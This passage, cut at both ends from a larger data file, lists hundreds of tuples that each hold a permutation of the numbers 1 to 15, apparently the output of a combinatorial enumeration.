5,8,1,9),(7,14,5,12,3,10,1,8,15,6,13,4,11,2,9),(7,14,5,12,3,10,1,9,2,11,4,13,6,15,8),(7,14,5,12,3,10,2,9,1,8,15,6,13,4,11),(7,14,5,12,3,10,2,9,1,11,4,13,6,15,8),(7,14,5,12,3,10,2,11,4,13,6,15,8,1,9),(7,14,5,12,3,11,4,13,6,15,8,1,9,2,10),(7,14,5,12,3,11,4,13,6,15,8,1,10,2,9),(7,14,5,12,4,11,1,8,15,6,13,3,10,2,9),(7,14,5,12,4,11,1,9,2,10,3,13,6,15,8),(7,14,5,12,4,11,2,9,1,8,15,6,13,3,10),(7,14,5,12,4,11,2,9,1,10,3,13,6,15,8),(7,14,5,12,4,11,2,10,3,13,6,15,8,1,9),(7,14,5,12,4,11,3,10,1,8,15,6,13,2,9),(7,14,5,12,4,11,3,10,1,9,2,13,6,15,8),(7,14,5,12,4,11,3,10,2,9,1,8,15,6,13),(7,14,5,12,4,11,3,10,2,9,1,13,6,15,8),(7,14,5,12,4,11,3,10,2,13,6,15,8,1,9),(7,14,5,12,4,11,3,13,6,15,8,1,9,2,10),(7,14,5,12,4,11,3,13,6,15,8,1,10,2,9),(7,14,5,12,4,13,6,15,8,1,9,2,10,3,11),(7,14,5,12,4,13,6,15,8,1,9,2,11,3,10),(7,14,5,12,4,13,6,15,8,1,10,3,11,2,9),(7,14,5,12,4,13,6,15,8,1,11,3,10,2,9),(7,14,5,13,6,15,8,1,9,2,10,3,11,4,12),(7,14,5,13,6,15,8,1,9,2,10,3,12,4,11),(7,14,5,13,6,15,8,1,9,2,11,4,12,3,10),(7,14,5,13,6,15,8,1,9,2,12,4,11,3,10),(7,14,5,13,6,15,8,1,10,3,11,4,12,2,9),(7,14,5,13,6,15,8,1,10,3,12,4,11,2,9),(7,14,5,13,6,15,8,1,11,4,12,3,10,2,9),(7,14,5,13,6,15,8,1,12,4,11,3,10,2,9),(7,14,6,13,1,8,15,5,12,4,11,3,10,2,9),(7,14,6,13,1,9,2,10,3,11,4,12,5,15,8),(7,14,6,13,2,9,1
,8,15,5,12,4,11,3,10),(7,14,6,13,2,9,1,10,3,11,4,12,5,15,8),(7,14,6,13,2,10,3,11,4,12,5,15,8,1,9),(7,14,6,13,3,10,1,8,15,5,12,4,11,2,9),(7,14,6,13,3,10,1,9,2,11,4,12,5,15,8),(7,14,6,13,3,10,2,9,1,8,15,5,12,4,11),(7,14,6,13,3,10,2,9,1,11,4,12,5,15,8),(7,14,6,13,3,10,2,11,4,12,5,15,8,1,9),(7,14,6,13,3,11,4,12,5,15,8,1,9,2,10),(7,14,6,13,3,11,4,12,5,15,8,1,10,2,9),(7,14,6,13,4,11,1,8,15,5,12,3,10,2,9),(7,14,6,13,4,11,1,9,2,10,3,12,5,15,8),(7,14,6,13,4,11,2,9,1,8,15,5,12,3,10),(7,14,6,13,4,11,2,9,1,10,3,12,5,15,8),(7,14,6,13,4,11,2,10,3,12,5,15,8,1,9),(7,14,6,13,4,11,3,10,1,8,15,5,12,2,9),(7,14,6,13,4,11,3,10,1,9,2,12,5,15,8),(7,14,6,13,4,11,3,10,2,9,1,8,15,5,12),(7,14,6,13,4,11,3,10,2,9,1,12,5,15,8),(7,14,6,13,4,11,3,10,2,12,5,15,8,1,9),(7,14,6,13,4,11,3,12,5,15,8,1,9,2,10),(7,14,6,13,4,11,3,12,5,15,8,1,10,2,9),(7,14,6,13,4,12,5,15,8,1,9,2,10,3,11),(7,14,6,13,4,12,5,15,8,1,9,2,11,3,10),(7,14,6,13,4,12,5,15,8,1,10,3,11,2,9),(7,14,6,13,4,12,5,15,8,1,11,3,10,2,9),(7,14,6,13,5,12,1,8,15,4,11,3,10,2,9),(7,14,6,13,5,12,1,9,2,10,3,11,4,15,8),(7,14,6,13,5,12,2,9,1,8,15,4,11,3,10),(7,14,6,13,5,12,2,9,1,10,3,11,4,15,8),(7,14,6,13,5,12,2,10,3,11,4,15,8,1,9),(7,14,6,13,5,12,3,10,1,8,15,4,11,2,9),(7,14,6,13,5,12,3,10,1,9,2,11,4,15,8),(7,14,6,13,5,12,3,10,2,9,1,8,15,4,11),(7,14,6,13,5,12,3,10,2,9,1,11,4,15,8),(7,14,6,13,5,12,3,10,2,11,4,15,8,1,9),(7,14,6,13,5,12,3,11,4,15,8,1,9,2,10),(7,14,6,13,5,12,3,11,4,15,8,1,10,2,9),(7,14,6,13,5,12,4,11,1,8,15,3,10,2,9),(7,14,6,13,5,12,4,11,1,9,2,10,3,15,8),(7,14,6,13,5,12,4,11,2,9,1,8,15,3,10),(7,14,6,13,5,12,4,11,2,9,1,10,3,15,8),(7,14,6,13,5,12,4,11,2,10,3,15,8,1,9),(7,14,6,13,5,12,4,11,3,10,1,8,15,2,9),(7,14,6,13,5,12,4,11,3,10,1,9,2,15,8),(7,14,6,13,5,12,4,11,3,10,2,9,1,8,15),(7,14,6,13,5,12,4,11,3,10,2,9,1,15,8),(7,14,6,13,5,12,4,11,3,10,2,15,8,1,9),(7,14,6,13,5,12,4,11,3,15,8,1,9,2,10),(7,14,6,13,5,12,4,11,3,15,8,1,10,2,9),(7,14,6,13,5,12,4,15,8,1,9,2,10,3,11),(7,14,6,13,5,12,4,15,8,1,9,2,11,3,10),(7,14,6,13,5,12,4,15,8,1,10,3,11,2,9),(7
,14,6,13,5,12,4,15,8,1,11,3,10,2,9),(7,14,6,13,5,15,8,1,9,2,10,3,11,4,12),(7,14,6,13,5,15,8,1,9,2,10,3,12,4,11),(7,14,6,13,5,15,8,1,9,2,11,4,12,3,10),(7,14,6,13,5,15,8,1,9,2,12,4,11,3,10),(7,14,6,13,5,15,8,1,10,3,11,4,12,2,9),(7,14,6,13,5,15,8,1,10,3,12,4,11,2,9),(7,14,6,13,5,15,8,1,11,4,12,3,10,2,9),(7,14,6,13,5,15,8,1,12,4,11,3,10,2,9),(7,14,6,15,8,1,9,2,10,3,11,4,12,5,13),(7,14,6,15,8,1,9,2,10,3,11,4,13,5,12),(7,14,6,15,8,1,9,2,10,3,12,5,13,4,11),(7,14,6,15,8,1,9,2,10,3,13,5,12,4,11),(7,14,6,15,8,1,9,2,11,4,12,5,13,3,10),(7,14,6,15,8,1,9,2,11,4,13,5,12,3,10),(7,14,6,15,8,1,9,2,12,5,13,4,11,3,10),(7,14,6,15,8,1,9,2,13,5,12,4,11,3,10),(7,14,6,15,8,1,10,3,11,4,12,5,13,2,9),(7,14,6,15,8,1,10,3,11,4,13,5,12,2,9),(7,14,6,15,8,1,10,3,12,5,13,4,11,2,9),(7,14,6,15,8,1,10,3,13,5,12,4,11,2,9),(7,14,6,15,8,1,11,4,12,5,13,3,10,2,9),(7,14,6,15,8,1,11,4,13,5,12,3,10,2,9),(7,14,6,15,8,1,12,5,13,4,11,3,10,2,9),(7,14,6,15,8,1,13,5,12,4,11,3,10,2,9),(7,15,8,1,9,2,10,3,11,4,12,5,13,6,14),(7,15,8,1,9,2,10,3,11,4,12,5,14,6,13),(7,15,8,1,9,2,10,3,11,4,13,6,14,5,12),(7,15,8,1,9,2,10,3,11,4,14,6,13,5,12),(7,15,8,1,9,2,10,3,12,5,13,6,14,4,11),(7,15,8,1,9,2,10,3,12,5,14,6,13,4,11),(7,15,8,1,9,2,10,3,13,6,14,5,12,4,11),(7,15,8,1,9,2,10,3,14,6,13,5,12,4,11),(7,15,8,1,9,2,11,4,12,5,13,6,14,3,10),(7,15,8,1,9,2,11,4,12,5,14,6,13,3,10),(7,15,8,1,9,2,11,4,13,6,14,5,12,3,10),(7,15,8,1,9,2,11,4,14,6,13,5,12,3,10),(7,15,8,1,9,2,12,5,13,6,14,4,11,3,10),(7,15,8,1,9,2,12,5,14,6,13,4,11,3,10),(7,15,8,1,9,2,13,6,14,5,12,4,11,3,10),(7,15,8,1,9,2,14,6,13,5,12,4,11,3,10),(7,15,8,1,10,3,11,4,12,5,13,6,14,2,9),(7,15,8,1,10,3,11,4,12,5,14,6,13,2,9),(7,15,8,1,10,3,11,4,13,6,14,5,12,2,9),(7,15,8,1,10,3,11,4,14,6,13,5,12,2,9),(7,15,8,1,10,3,12,5,13,6,14,4,11,2,9),(7,15,8,1,10,3,12,5,14,6,13,4,11,2,9),(7,15,8,1,10,3,13,6,14,5,12,4,11,2,9),(7,15,8,1,10,3,14,6,13,5,12,4,11,2,9),(7,15,8,1,11,4,12,5,13,6,14,3,10,2,9),(7,15,8,1,11,4,12,5,14,6,13,3,10,2,9),(7,15,8,1,11,4,13,6,14,5,12,3,10,2,9),(7,15,8,1,11,4,14,6,13,5,1
2,3,10,2,9),(7,15,8,1,12,5,13,6,14,4,11,3,10,2,9),(7,15,8,1,12,5,14,6,13,4,11,3,10,2,9),(7,15,8,1,13,6,14,5,12,4,11,3,10,2,9),(7,15,8,1,14,6,13,5,12,4,11,3,10,2,9),(8,1,9,2,10,3,11,4,12,5,13,6,14,7,15),(8,1,9,2,10,3,11,4,12,5,13,6,15,7,14),(8,1,9,2,10,3,11,4,12,5,14,7,15,6,13),(8,1,9,2,10,3,11,4,12,5,15,7,14,6,13),(8,1,9,2,10,3,11,4,13,6,14,7,15,5,12),(8,1,9,2,10,3,11,4,13,6,15,7,14,5,12),(8,1,9,2,10,3,11,4,14,7,15,6,13,5,12),(8,1,9,2,10,3,11,4,15,7,14,6,13,5,12),(8,1,9,2,10,3,12,5,13,6,14,7,15,4,11),(8,1,9,2,10,3,12,5,13,6,15,7,14,4,11),(8,1,9,2,10,3,12,5,14,7,15,6,13,4,11),(8,1,9,2,10,3,12,5,15,7,14,6,13,4,11),(8,1,9,2,10,3,13,6,14,7,15,5,12,4,11),(8,1,9,2,10,3,13,6,15,7,14,5,12,4,11),(8,1,9,2,10,3,14,7,15,6,13,5,12,4,11),(8,1,9,2,10,3,15,7,14,6,13,5,12,4,11),(8,1,9,2,11,4,12,5,13,6,14,7,15,3,10),(8,1,9,2,11,4,12,5,13,6,15,7,14,3,10),(8,1,9,2,11,4,12,5,14,7,15,6,13,3,10),(8,1,9,2,11,4,12,5,15,7,14,6,13,3,10),(8,1,9,2,11,4,13,6,14,7,15,5,12,3,10),(8,1,9,2,11,4,13,6,15,7,14,5,12,3,10),(8,1,9,2,11,4,14,7,15,6,13,5,12,3,10),(8,1,9,2,11,4,15,7,14,6,13,5,12,3,10),(8,1,9,2,12,5,13,6,14,7,15,4,11,3,10),(8,1,9,2,12,5,13,6,15,7,14,4,11,3,10),(8,1,9,2,12,5,14,7,15,6,13,4,11,3,10),(8,1,9,2,12,5,15,7,14,6,13,4,11,3,10),(8,1,9,2,13,6,14,7,15,5,12,4,11,3,10),(8,1,9,2,13,6,15,7,14,5,12,4,11,3,10),(8,1,9,2,14,7,15,6,13,5,12,4,11,3,10),(8,1,9,2,15,7,14,6,13,5,12,4,11,3,10),(8,1,10,3,11,4,12,5,13,6,14,7,15,2,9),(8,1,10,3,11,4,12,5,13,6,15,7,14,2,9),(8,1,10,3,11,4,12,5,14,7,15,6,13,2,9),(8,1,10,3,11,4,12,5,15,7,14,6,13,2,9),(8,1,10,3,11,4,13,6,14,7,15,5,12,2,9),(8,1,10,3,11,4,13,6,15,7,14,5,12,2,9),(8,1,10,3,11,4,14,7,15,6,13,5,12,2,9),(8,1,10,3,11,4,15,7,14,6,13,5,12,2,9),(8,1,10,3,12,5,13,6,14,7,15,4,11,2,9),(8,1,10,3,12,5,13,6,15,7,14,4,11,2,9),(8,1,10,3,12,5,14,7,15,6,13,4,11,2,9),(8,1,10,3,12,5,15,7,14,6,13,4,11,2,9),(8,1,10,3,13,6,14,7,15,5,12,4,11,2,9),(8,1,10,3,13,6,15,7,14,5,12,4,11,2,9),(8,1,10,3,14,7,15,6,13,5,12,4,11,2,9),(8,1,10,3,15,7,14,6,13,5,12,4,11,2,9),(8,1,11,4,12
,5,13,6,14,7,15,3,10,2,9),(8,1,11,4,12,5,13,6,15,7,14,3,10,2,9),(8,1,11,4,12,5,14,7,15,6,13,3,10,2,9),(8,1,11,4,12,5,15,7,14,6,13,3,10,2,9),(8,1,11,4,13,6,14,7,15,5,12,3,10,2,9),(8,1,11,4,13,6,15,7,14,5,12,3,10,2,9),(8,1,11,4,14,7,15,6,13,5,12,3,10,2,9),(8,1,11,4,15,7,14,6,13,5,12,3,10,2,9),(8,1,12,5,13,6,14,7,15,4,11,3,10,2,9),(8,1,12,5,13,6,15,7,14,4,11,3,10,2,9),(8,1,12,5,14,7,15,6,13,4,11,3,10,2,9),(8,1,12,5,15,7,14,6,13,4,11,3,10,2,9),(8,1,13,6,14,7,15,5,12,4,11,3,10,2,9),(8,1,13,6,15,7,14,5,12,4,11,3,10,2,9),(8,1,14,7,15,6,13,5,12,4,11,3,10,2,9),(8,1,15,7,14,6,13,5,12,4,11,3,10,2,9),(8,15,1,9,2,10,3,11,4,12,5,13,6,14,7),(8,15,2,9,1,10,3,11,4,12,5,13,6,14,7),(8,15,3,10,1,9,2,11,4,12,5,13,6,14,7),(8,15,3,10,2,9,1,11,4,12,5,13,6,14,7),(8,15,4,11,1,9,2,10,3,12,5,13,6,14,7),(8,15,4,11,2,9,1,10,3,12,5,13,6,14,7),(8,15,4,11,3,10,1,9,2,12,5,13,6,14,7),(8,15,4,11,3,10,2,9,1,12,5,13,6,14,7),(8,15,5,12,1,9,2,10,3,11,4,13,6,14,7),(8,15,5,12,2,9,1,10,3,11,4,13,6,14,7),(8,15,5,12,3,10,1,9,2,11,4,13,6,14,7),(8,15,5,12,3,10,2,9,1,11,4,13,6,14,7),(8,15,5,12,4,11,1,9,2,10,3,13,6,14,7),(8,15,5,12,4,11,2,9,1,10,3,13,6,14,7),(8,15,5,12,4,11,3,10,1,9,2,13,6,14,7),(8,15,5,12,4,11,3,10,2,9,1,13,6,14,7),(8,15,6,13,1,9,2,10,3,11,4,12,5,14,7),(8,15,6,13,2,9,1,10,3,11,4,12,5,14,7),(8,15,6,13,3,10,1,9,2,11,4,12,5,14,7),(8,15,6,13,3,10,2,9,1,11,4,12,5,14,7),(8,15,6,13,4,11,1,9,2,10,3,12,5,14,7),(8,15,6,13,4,11,2,9,1,10,3,12,5,14,7),(8,15,6,13,4,11,3,10,1,9,2,12,5,14,7),(8,15,6,13,4,11,3,10,2,9,1,12,5,14,7),(8,15,6,13,5,12,1,9,2,10,3,11,4,14,7),(8,15,6,13,5,12,2,9,1,10,3,11,4,14,7),(8,15,6,13,5,12,3,10,1,9,2,11,4,14,7),(8,15,6,13,5,12,3,10,2,9,1,11,4,14,7),(8,15,6,13,5,12,4,11,1,9,2,10,3,14,7),(8,15,6,13,5,12,4,11,2,9,1,10,3,14,7),(8,15,6,13,5,12,4,11,3,10,1,9,2,14,7),(8,15,6,13,5,12,4,11,3,10,2,9,1,14,7),(8,15,7,14,1,9,2,10,3,11,4,12,5,13,6),(8,15,7,14,2,9,1,10,3,11,4,12,5,13,6),(8,15,7,14,3,10,1,9,2,11,4,12,5,13,6),(8,15,7,14,3,10,2,9,1,11,4,12,5,13,6),(8,15,7,14,4,11,1,9,2,10,3,12,5,13,6
),(8,15,7,14,4,11,2,9,1,10,3,12,5,13,6),(8,15,7,14,4,11,3,10,1,9,2,12,5,13,6),(8,15,7,14,4,11,3,10,2,9,1,12,5,13,6),(8,15,7,14,5,12,1,9,2,10,3,11,4,13,6),(8,15,7,14,5,12,2,9,1,10,3,11,4,13,6),(8,15,7,14,5,12,3,10,1,9,2,11,4,13,6),(8,15,7,14,5,12,3,10,2,9,1,11,4,13,6),(8,15,7,14,5,12,4,11,1,9,2,10,3,13,6),(8,15,7,14,5,12,4,11,2,9,1,10,3,13,6),(8,15,7,14,5,12,4,11,3,10,1,9,2,13,6),(8,15,7,14,5,12,4,11,3,10,2,9,1,13,6),(8,15,7,14,6,13,1,9,2,10,3,11,4,12,5),(8,15,7,14,6,13,2,9,1,10,3,11,4,12,5),(8,15,7,14,6,13,3,10,1,9,2,11,4,12,5),(8,15,7,14,6,13,3,10,2,9,1,11,4,12,5),(8,15,7,14,6,13,4,11,1,9,2,10,3,12,5),(8,15,7,14,6,13,4,11,2,9,1,10,3,12,5),(8,15,7,14,6,13,4,11,3,10,1,9,2,12,5),(8,15,7,14,6,13,4,11,3,10,2,9,1,12,5),(8,15,7,14,6,13,5,12,1,9,2,10,3,11,4),(8,15,7,14,6,13,5,12,2,9,1,10,3,11,4),(8,15,7,14,6,13,5,12,3,10,1,9,2,11,4),(8,15,7,14,6,13,5,12,3,10,2,9,1,11,4),(8,15,7,14,6,13,5,12,4,11,1,9,2,10,3),(8,15,7,14,6,13,5,12,4,11,2,9,1,10,3),(8,15,7,14,6,13,5,12,4,11,3,10,1,9,2),(8,15,7,14,6,13,5,12,4,11,3,10,2,9,1),(9,1,8,15,2,10,3,11,4,12,5,13,6,14,7),(9,1,8,15,3,10,2,11,4,12,5,13,6,14,7),(9,1,8,15,4,11,2,10,3,12,5,13,6,14,7),(9,1,8,15,4,11,3,10,2,12,5,13,6,14,7),(9,1,8,15,5,12,2,10,3,11,4,13,6,14,7),(9,1,8,15,5,12,3,10,2,11,4,13,6,14,7),(9,1,8,15,5,12,4,11,2,10,3,13,6,14,7),(9,1,8,15,5,12,4,11,3,10,2,13,6,14,7),(9,1,8,15,6,13,2,10,3,11,4,12,5,14,7),(9,1,8,15,6,13,3,10,2,11,4,12,5,14,7),(9,1,8,15,6,13,4,11,2,10,3,12,5,14,7),(9,1,8,15,6,13,4,11,3,10,2,12,5,14,7),(9,1,8,15,6,13,5,12,2,10,3,11,4,14,7),(9,1,8,15,6,13,5,12,3,10,2,11,4,14,7),(9,1,8,15,6,13,5,12,4,11,2,10,3,14,7),(9,1,8,15,6,13,5,12,4,11,3,10,2,14,7),(9,1,8,15,7,14,2,10,3,11,4,12,5,13,6),(9,1,8,15,7,14,3,10,2,11,4,12,5,13,6),(9,1,8,15,7,14,4,11,2,10,3,12,5,13,6),(9,1,8,15,7,14,4,11,3,10,2,12,5,13,6),(9,1,8,15,7,14,5,12,2,10,3,11,4,13,6),(9,1,8,15,7,14,5,12,3,10,2,11,4,13,6),(9,1,8,15,7,14,5,12,4,11,2,10,3,13,6),(9,1,8,15,7,14,5,12,4,11,3,10,2,13,6),(9,1,8,15,7,14,6,13,2,10,3,11,4,12,5),(9,1,8,15,7,14,6,13,3,
10,2,11,4,12,5),(9,1,8,15,7,14,6,13,4,11,2,10,3,12,5),(9,1,8,15,7,14,6,13,4,11,3,10,2,12,5),(9,1,8,15,7,14,6,13,5,12,2,10,3,11,4),(9,1,8,15,7,14,6,13,5,12,3,10,2,11,4),(9,1,8,15,7,14,6,13,5,12,4,11,2,10,3),(9,1,8,15,7,14,6,13,5,12,4,11,3,10,2),(9,2,10,1,8,15,3,11,4,12,5,13,6,14,7),(9,2,10,1,8,15,4,11,3,12,5,13,6,14,7),(9,2,10,1,8,15,5,12,3,11,4,13,6,14,7),(9,2,10,1,8,15,5,12,4,11,3,13,6,14,7),(9,2,10,1,8,15,6,13,3,11,4,12,5,14,7),(9,2,10,1,8,15,6,13,4,11,3,12,5,14,7),(9,2,10,1,8,15,6,13,5,12,3,11,4,14,7),(9,2,10,1,8,15,6,13,5,12,4,11,3,14,7),(9,2,10,1,8,15,7,14,3,11,4,12,5,13,6),(9,2,10,1,8,15,7,14,4,11,3,12,5,13,6),(9,2,10,1,8,15,7,14,5,12,3,11,4,13,6),(9,2,10,1,8,15,7,14,5,12,4,11,3,13,6),(9,2,10,1,8,15,7,14,6,13,3,11,4,12,5),(9,2,10,1,8,15,7,14,6,13,4,11,3,12,5),(9,2,10,1,8,15,7,14,6,13,5,12,3,11,4),(9,2,10,1,8,15,7,14,6,13,5,12,4,11,3),(9,2,10,3,11,1,8,15,4,12,5,13,6,14,7),(9,2,10,3,11,1,8,15,5,12,4,13,6,14,7),(9,2,10,3,11,1,8,15,6,13,4,12,5,14,7),(9,2,10,3,11,1,8,15,6,13,5,12,4,14,7),(9,2,10,3,11,1,8,15,7,14,4,12,5,13,6),(9,2,10,3,11,1,8,15,7,14,5,12,4,13,6),(9,2,10,3,11,1,8,15,7,14,6,13,4,12,5),(9,2,10,3,11,1,8,15,7,14,6,13,5,12,4),(9,2,10,3,11,4,12,1,8,15,5,13,6,14,7),(9,2,10,3,11,4,12,1,8,15,6,13,5,14,7),(9,2,10,3,11,4,12,1,8,15,7,14,5,13,6),(9,2,10,3,11,4,12,1,8,15,7,14,6,13,5),(9,2,10,3,11,4,12,5,13,1,8,15,6,14,7),(9,2,10,3,11,4,12,5,13,1,8,15,7,14,6),(9,2,10,3,11,4,12,5,13,6,14,1,8,15,7),(9,2,10,3,11,4,12,5,13,6,14,7,15,1,8),(9,2,10,3,11,4,12,5,13,6,14,7,15,8,1),(9,2,10,3,11,4,12,5,13,6,15,7,14,1,8),(9,2,10,3,11,4,12,5,13,6,15,8,1,14,7),(9,2,10,3,11,4,12,5,14,6,13,1,8,15,7),(9,2,10,3,11,4,12,5,14,7,15,6,13,1,8),(9,2,10,3,11,4,12,5,14,7,15,8,1,13,6),(9,2,10,3,11,4,12,5,15,7,14,6,13,1,8),(9,2,10,3,11,4,12,5,15,8,1,13,6,14,7),(9,2,10,3,11,4,13,5,12,1,8,15,6,14,7),(9,2,10,3,11,4,13,5,12,1,8,15,7,14,6),(9,2,10,3,11,4,13,6,14,5,12,1,8,15,7),(9,2,10,3,11,4,13,6,14,7,15,5,12,1,8),(9,2,10,3,11,4,13,6,14,7,15,8,1,12,5),(9,2,10,3,11,4,13,6,15,7,14,5,12,1,8),(9,2,10,
3,11,4,13,6,15,8,1,12,5,14,7),(9,2,10,3,11,4,14,6,13,5,12,1,8,15,7),(9,2,10,3,11,4,14,7,15,6,13,5,12,1,8),(9,2,10,3,11,4,14,7,15,8,1,12,5,13,6),(9,2,10,3,11,4,15,7,14,6,13,5,12,1,8),(9,2,10,3,11,4,15,8,1,12,5,13,6,14,7),(9,2,10,3,12,4,11,1,8,15,5,13,6,14,7),(9,2,10,3,12,4,11,1,8,15,6,13,5,14,7),(9,2,10,3,12,4,11,1,8,15,7,14,5,13,6),(9,2,10,3,12,4,11,1,8,15,7,14,6,13,5),(9,2,10,3,12,5,13,4,11,1,8,15,6,14,7),(9,2,10,3,12,5,13,4,11,1,8,15,7,14,6),(9,2,10,3,12,5,13,6,14,4,11,1,8,15,7),(9,2,10,3,12,5,13,6,14,7,15,4,11,1,8),(9,2,10,3,12,5,13,6,14,7,15,8,1,11,4),(9,2,10,3,12,5,13,6,15,7,14,4,11,1,8),(9,2,10,3,12,5,13,6,15,8,1,11,4,14,7),(9,2,10,3,12,5,14,6,13,4,11,1,8,15,7),(9,2,10,3,12,5,14,7,15,6,13,4,11,1,8),(9,2,10,3,12,5,14,7,15,8,1,11,4,13,6),(9,2,10,3,12,5,15,7,14,6,13,4,11,1,8),(9,2,10,3,12,5,15,8,1,11,4,13,6,14,7),(9,2,10,3,13,5,12,4,11,1,8,15,6,14,7),(9,2,10,3,13,5,12,4,11,1,8,15,7,14,6),(9,2,10,3,13,6,14,5,12,4,11,1,8,15,7),(9,2,10,3,13,6,14,7,15,5,12,4,11,1,8),(9,2,10,3,13,6,14,7,15,8,1,11,4,12,5),(9,2,10,3,13,6,15,7,14,5,12,4,11,1,8),(9,2,10,3,13,6,15,8,1,11,4,12,5,14,7),(9,2,10,3,14,6,13,5,12,4,11,1,8,15,7),(9,2,10,3,14,7,15,6,13,5,12,4,11,1,8),(9,2,10,3,14,7,15,8,1,11,4,12,5,13,6),(9,2,10,3,15,7,14,6,13,5,12,4,11,1,8),(9,2,10,3,15,8,1,11,4,12,5,13,6,14,7),(9,2,11,3,10,1,8,15,4,12,5,13,6,14,7),(9,2,11,3,10,1,8,15,5,12,4,13,6,14,7),(9,2,11,3,10,1,8,15,6,13,4,12,5,14,7),(9,2,11,3,10,1,8,15,6,13,5,12,4,14,7),(9,2,11,3,10,1,8,15,7,14,4,12,5,13,6),(9,2,11,3,10,1,8,15,7,14,5,12,4,13,6),(9,2,11,3,10,1,8,15,7,14,6,13,4,12,5),(9,2,11,3,10,1,8,15,7,14,6,13,5,12,4),(9,2,11,4,12,3,10,1,8,15,5,13,6,14,7),(9,2,11,4,12,3,10,1,8,15,6,13,5,14,7),(9,2,11,4,12,3,10,1,8,15,7,14,5,13,6),(9,2,11,4,12,3,10,1,8,15,7,14,6,13,5),(9,2,11,4,12,5,13,3,10,1,8,15,6,14,7),(9,2,11,4,12,5,13,3,10,1,8,15,7,14,6),(9,2,11,4,12,5,13,6,14,3,10,1,8,15,7),(9,2,11,4,12,5,13,6,14,7,15,3,10,1,8),(9,2,11,4,12,5,13,6,14,7,15,8,1,10,3),(9,2,11,4,12,5,13,6,15,7,14,3,10,1,8),(9,2,11,4,12,5,13,6,15,8,1,10,3,
14,7),(9,2,11,4,12,5,14,6,13,3,10,1,8,15,7),(9,2,11,4,12,5,14,7,15,6,13,3,10,1,8),(9,2,11,4,12,5,14,7,15,8,1,10,3,13,6),(9,2,11,4,12,5,15,7,14,6,13,3,10,1,8),(9,2,11,4,12,5,15,8,1,10,3,13,6,14,7),(9,2,11,4,13,5,12,3,10,1,8,15,6,14,7),(9,2,11,4,13,5,12,3,10,1,8,15,7,14,6),(9,2,11,4,13,6,14,5,12,3,10,1,8,15,7),(9,2,11,4,13,6,14,7,15,5,12,3,10,1,8),(9,2,11,4,13,6,14,7,15,8,1,10,3,12,5),(9,2,11,4,13,6,15,7,14,5,12,3,10,1,8),(9,2,11,4,13,6,15,8,1,10,3,12,5,14,7),(9,2,11,4,14,6,13,5,12,3,10,1,8,15,7),(9,2,11,4,14,7,15,6,13,5,12,3,10,1,8),(9,2,11,4,14,7,15,8,1,10,3,12,5,13,6),(9,2,11,4,15,7,14,6,13,5,12,3,10,1,8),(9,2,11,4,15,8,1,10,3,12,5,13,6,14,7),(9,2,12,4,11,3,10,1,8,15,5,13,6,14,7),(9,2,12,4,11,3,10,1,8,15,6,13,5,14,7),(9,2,12,4,11,3,10,1,8,15,7,14,5,13,6),(9,2,12,4,11,3,10,1,8,15,7,14,6,13,5),(9,2,12,5,13,4,11,3,10,1,8,15,6,14,7),(9,2,12,5,13,4,11,3,10,1,8,15,7,14,6),(9,2,12,5,13,6,14,4,11,3,10,1,8,15,7),(9,2,12,5,13,6,14,7,15,4,11,3,10,1,8),(9,2,12,5,13,6,14,7,15,8,1,10,3,11,4),(9,2,12,5,13,6,15,7,14,4,11,3,10,1,8),(9,2,12,5,13,6,15,8,1,10,3,11,4,14,7),(9,2,12,5,14,6,13,4,11,3,10,1,8,15,7),(9,2,12,5,14,7,15,6,13,4,11,3,10,1,8),(9,2,12,5,14,7,15,8,1,10,3,11,4,13,6),(9,2,12,5,15,7,14,6,13,4,11,3,10,1,8),(9,2,12,5,15,8,1,10,3,11,4,13,6,14,7),(9,2,13,5,12,4,11,3,10,1,8,15,6,14,7),(9,2,13,5,12,4,11,3,10,1,8,15,7,14,6),(9,2,13,6,14,5,12,4,11,3,10,1,8,15,7),(9,2,13,6,14,7,15,5,12,4,11,3,10,1,8),(9,2,13,6,14,7,15,8,1,10,3,11,4,12,5),(9,2,13,6,15,7,14,5,12,4,11,3,10,1,8),(9,2,13,6,15,8,1,10,3,11,4,12,5,14,7),(9,2,14,6,13,5,12,4,11,3,10,1,8,15,7),(9,2,14,7,15,6,13,5,12,4,11,3,10,1,8),(9,2,14,7,15,8,1,10,3,11,4,12,5,13,6),(9,2,15,7,14,6,13,5,12,4,11,3,10,1,8),(9,2,15,8,1,10,3,11,4,12,5,13,6,14,7),(10,2,9,1,8,15,3,11,4,12,5,13,6,14,7),(10,2,9,1,8,15,4,11,3,12,5,13,6,14,7),(10,2,9,1,8,15,5,12,3,11,4,13,6,14,7),(10,2,9,1,8,15,5,12,4,11,3,13,6,14,7),(10,2,9,1,8,15,6,13,3,11,4,12,5,14,7),(10,2,9,1,8,15,6,13,4,11,3,12,5,14,7),(10,2,9,1,8,15,6,13,5,12,3,11,4,14,7),(10,2,9,1,8,15,6,1
3,5,12,4,11,3,14,7),(10,2,9,1,8,15,7,14,3,11,4,12,5,13,6),(10,2,9,1,8,15,7,14,4,11,3,12,5,13,6),(10,2,9,1,8,15,7,14,5,12,3,11,4,13,6),(10,2,9,1,8,15,7,14,5,12,4,11,3,13,6),(10,2,9,1,8,15,7,14,6,13,3,11,4,12,5),(10,2,9,1,8,15,7,14,6,13,4,11,3,12,5),(10,2,9,1,8,15,7,14,6,13,5,12,3,11,4),(10,2,9,1,8,15,7,14,6,13,5,12,4,11,3),(10,3,11,2,9,1,8,15,4,12,5,13,6,14,7),(10,3,11,2,9,1,8,15,5,12,4,13,6,14,7),(10,3,11,2,9,1,8,15,6,13,4,12,5,14,7),(10,3,11,2,9,1,8,15,6,13,5,12,4,14,7),(10,3,11,2,9,1,8,15,7,14,4,12,5,13,6),(10,3,11,2,9,1,8,15,7,14,5,12,4,13,6),(10,3,11,2,9,1,8,15,7,14,6,13,4,12,5),(10,3,11,2,9,1,8,15,7,14,6,13,5,12,4),(10,3,11,4,12,2,9,1,8,15,5,13,6,14,7),(10,3,11,4,12,2,9,1,8,15,6,13,5,14,7),(10,3,11,4,12,2,9,1,8,15,7,14,5,13,6),(10,3,11,4,12,2,9,1,8,15,7,14,6,13,5),(10,3,11,4,12,5,13,2,9,1,8,15,6,14,7),(10,3,11,4,12,5,13,2,9,1,8,15,7,14,6),(10,3,11,4,12,5,13,6,14,2,9,1,8,15,7),(10,3,11,4,12,5,13,6,14,7,15,2,9,1,8),(10,3,11,4,12,5,13,6,14,7,15,8,1,9,2),(10,3,11,4,12,5,13,6,15,7,14,2,9,1,8),(10,3,11,4,12,5,13,6,15,8,1,9,2,14,7),(10,3,11,4,12,5,14,6,13,2,9,1,8,15,7),(10,3,11,4